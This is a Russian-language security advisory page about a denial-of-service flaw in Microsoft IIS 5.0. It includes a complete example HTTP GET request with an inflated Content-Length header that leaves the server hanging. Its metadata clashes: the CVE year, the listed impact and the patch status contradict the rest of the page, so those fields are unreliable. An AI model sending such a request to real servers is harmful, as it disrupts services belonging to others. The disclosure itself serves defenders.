Dos против Microsoft IIS 5.0

Дата публикации:	13.12.2001
Всего просмотров:	1540
Опасность:	Низкая
Наличие исправления:	Инстуркции по устранению
Количество уязвимостей:	1
CVE ID:	CVE-2005-2678
Вектор эксплуатации:	Удаленная
Воздействие:	Раскрытие важных данных
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:	Microsoft Internet Information Services (IIS) 5.x
Описание:	Microsoft IIS 5.0 склонен к DoS атаке, если ему послать специально обработанный уродливый HTTP Get заголовок. Если к IIS 5.0 послан обработанный HTTP Get запрос, который содержит фальсифицированное и чрезмерное поле "Content-length", сервер ведет себя необычно. Сервер сохраняет подключение открытым, однако не отвечает на него. Это может использоваться для DoS атаки против Web сервера. Пример: GET /testfile HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Host: 192.168.0.10 Connection: Keep-Alive Content-Length: 5300643 Authorization: Basic Патча пока нет
Ссылки:	Эксплоит

Dos против Microsoft IIS 5.0

Подпишитесь на email рассылку